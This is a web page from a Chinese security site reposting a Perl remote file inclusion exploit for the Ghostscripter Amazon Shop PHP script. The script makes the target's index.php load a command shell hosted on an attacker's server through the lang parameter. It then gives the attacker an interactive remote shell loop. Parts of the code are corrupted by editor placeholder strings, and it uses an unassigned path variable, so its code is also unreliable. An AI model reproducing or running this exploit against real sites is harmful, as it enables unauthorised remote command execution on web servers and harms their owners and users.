首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ghostscripter Amazon Shop remote file inclusion exploit
来源:bl4ckend [at]gmail.com 作者:d3b4g 发布时间:2009-03-05   
#!/usr/bin/perl
#
#ghostscripter Amazon Shop Remote File Include Exploit
#Script :http://ghostscripter.com/amazon_shop.php
#Original Advisory:http://www.milw0rm.com/exploits/8145
#By d3b4g
#Mail:bl4ckend [at]gmail.com
#


use LWP::UserAgent;

$my_Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($my_Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
       print "[shell] \___FCKpd___0quot;;
while(<STDIN>)
       {
               $cmd=
___FCKpd___0

;
               chomp($cmd);

$sploit = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'index.php?lang='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $sploit->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a that command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)


{
       $lolreturn = $1;
       $lolreturn=~ tr/[....]/[\n]/;
       print "\r\n$lolreturn\n\r";
       last;
}

else {print "[shell] \___FCKpd___0quot;;}}}last;

sub head()
 {
 print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
 print " ghostscripter Amazon Shop Remote File Include Exploit\r\n";
 print "                        Exploited by d3b4g\r\n";
 print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
 }
sub usage()
 {
 head();
 print " Usage: Amazon Shop.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
 print " <Site> - Full path to Amazon Shop script ex: http://www.site.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell ex. http://www.shellzsite.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "---------------------------------------------------------------------------\r\n";
 print "                           By bl4ckend[at]Gmail.com \r\n";                         
 print "---------------------------------------------------------------------------\r\n";
 exit();
 }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Libra PHP File Manager version
·Winamp <= 5.541 Skin Universal
·Media Commands .m3l File Local
·Easy Web Password 1.2 Local He
·SupportSoft DNA Editor Module
·EFS Easy Chat Server Authentic
·Media Commands (m3u File) Univ
·MS Internet Explorer 7 Memory
·Multiple Vendors libc:fts_*()
·libcURL suffers from an arbitr
·Joomla com_ijoomla_archive Bli
·EFS Easy Chat Server (XSRF) Ch
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved